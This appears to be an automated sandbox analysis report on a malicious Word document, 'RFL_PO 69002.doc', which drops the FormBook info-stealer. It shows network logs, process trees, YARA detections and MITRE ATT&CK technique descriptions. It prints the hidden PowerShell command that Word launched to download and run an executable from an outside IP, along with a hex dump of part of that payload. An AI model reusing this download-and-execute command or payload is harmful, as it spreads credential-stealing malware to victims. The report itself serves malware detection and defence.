Jun 11, 2021 07:42:17.913352966 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:18.078919888 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:18.707071066 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:18.765530109 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:19.405277014 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:19.468416929 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:19.917454958 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:19.977097034 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:20.581916094 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:20.646002054 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:21.296673059 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:21.348766088 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:22.093786955 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:22.144459963 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:23.241625071 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:23.294504881 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:24.207333088 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:24.269033909 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:24.719552040 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:24.780714035 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:37.837280989 CEST	61946	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:37.904129028 CEST	53	61946	8.8.8.8	192.168.2.3
Jun 11, 2021 07:42:42.347331047 CEST	64910	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:42:42.411797047 CEST	53	64910	8.8.8.8	192.168.2.3
Jun 11, 2021 07:43:16.409578085 CEST	52123	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:43:16.481569052 CEST	53	52123	8.8.8.8	192.168.2.3
Jun 11, 2021 07:43:17.797094107 CEST	56130	53	192.168.2.3	8.8.8.8
Jun 11, 2021 07:43:17.856029987 CEST	53	56130	8.8.8.8	192.168.2.3

HTTP Request Dependency Graph

31.210.20.45

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49728	31.210.20.45	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 07:41:48.573122978 CEST	1158	OUT	HEAD /1xBet/RFL_0769002.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: 31.210.20.45
Jun 11, 2021 07:41:48.625103951 CEST	1158	IN	HTTP/1.1 200 OK Date: Fri, 11 Jun 2021 05:41:48 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 Last-Modified: Thu, 10 Jun 2021 08:59:35 GMT ETag: "823f0-5c4659c35de2e" Accept-Ranges: bytes Content-Length: 533488 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
Jun 11, 2021 07:41:48.669747114 CEST	1158	OUT	GET /1xBet/RFL_0769002.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Thu, 10 Jun 2021 08:59:35 GMT User-Agent: Microsoft BITS/7.8 Host: 31.210.20.45
Jun 11, 2021 07:41:48.725075006 CEST	1160	IN	HTTP/1.1 200 OK Date: Fri, 11 Jun 2021 05:41:48 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 Last-Modified: Thu, 10 Jun 2021 08:59:35 GMT ETag: "823f0-5c4659c35de2e" Accept-Ranges: bytes Content-Length: 533488 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5e 07 69 d6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 b0 07 00 00 4a 00 00 00 00 00 00 de cf 07 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 cf 07 00 53 00 00 00 00 e0 07 00 e8 46 00 00 00 00 00 00 00 00 00 00 00 fc 07 00 f0 27 00 00 00 40 08 00 0c 00 00 00 6c cf 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 af 07 00 00 20 00 00 00 b0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 46 00 00 00 e0 07 00 00 48 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 cf 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 b0 07 00 8c 1e 00 00 03 00 00 00 26 00 00 06 f8 2a 00 00 e8 85 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 31 00 00 06 2a 92 02 28 01 00 00 0a 28 02 00 00 0a 02 fe 06 03 00 00 06 73 03 00 00 0a 6f 04 00 00 0a 02 03 7d 01 00 00 04 2a 1b 30 02 00 46 00 00 00 01 00 00 11 28 05 00 00 0a 72 01 00 00 70 6f 06 00 00 0a 0a 73 07 00 00 0a 0b 06 07 6f 08 00 00 0a 28 02 00 00 0a 07 6f 09 00 00 0a 6f 0a 00 00 0a 0c de 14 07 2c 06 07 6f 0b 00 00 0a dc 06 2c 06 06 6f 0b 00 00 0a dc 08 2a 00 00 01 1c 00 00 02 00 16 00 1a 30 00 0a 00 00 00 00 02 00 10 00 2a 3a 00 0a 00 00 00 00 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 00 13 30 02 00 27 00 00 00 02 00 00 11 1f 16 0a 2b 0e 20 e8 03 00 00 28 0c 00 00 0a 06 17 59 0a 06 2d ef 73 0d 00 00 0a 6f 0e 00 00 0a 02 7b 01 00 00 04 2a 06 2a 1e 02 28 01 00 00 0a 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 3e 02 16 28 0e 00 00 06 02 16 28 10 00 00 06 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 3e 02 16 28 13 00 00 06 02 16 28 15 00 00 06 2a 1e 02 28 13 30 02 00 62 00 00 00 03 00 00 11 17 73 02 00 00 06 0a 17 73 02 00 00 06 0b 72 39 00 00 70 06 6f 06 00 00 06 8c 0d 00 00 01 28 10 00 00 0a 28 11 00 00 0a 72 5d 00 00 70 07 6f 06 00 00 06 8c 0d 00 00 01 28 10 00 00 0a 28 11 00 00 0a 18 28 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL^i0J @ `@SF'@l H.text `.rsrcFH@@.reloc@@BH&(1((so}0F(rposo(oo,o,o0:~0'+ (Y-so{({"}{"}>(({"}{"}>(((0bssr9po((r]po(((

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3664 Parent PID: 792

General

Start time:	07:41:14
Start date:	11/06/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase:	0xd0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 4220 Parent PID: 3664

General

Start time:	07:41:20
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Imagebase:	0x1010000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 3492 Parent PID: 4220

General

Start time:	07:41:21
Start date:	11/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: nothinglittle.exe PID: 6988 Parent PID: 4220

General

Start time:	07:41:50
Start date:	11/06/2021
Path:	C:\Users\Public\Documents\nothinglittle.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Documents\nothinglittle.exe
Imagebase:	0xd10000
File size:	533488 bytes
MD5 hash:	3C88C6EF1A906BC81FC6B5B7FC478E0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000000.275702172.0000000000D12000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.432793873.0000000000D12000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000003.430227602.0000000001416000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: nothinglittle.exe PID: 6172 Parent PID: 6988

General

Start time:	07:43:04
Start date:	11/06/2021
Path:	C:\Users\user\AppData\Local\Temp\nothinglittle.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\nothinglittle.exe
Imagebase:	0x7d0000
File size:	533488 bytes
MD5 hash:	3C88C6EF1A906BC81FC6B5B7FC478E0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000000.431614413.00000000007D2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000002.491282271.00000000007D2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001C.00000000.432322254.00000000007D2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, Metadefender, Browse Detection: 55%, ReversingLabs
Reputation:	low

Analysis Process: explorer.exe PID: 3388 Parent PID: 6172

General

Start time:	07:43:06
Start date:	11/06/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report RFL_PO 69002.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "RFL_PO 69002.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 993

General

VBA Code Keywords

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 1786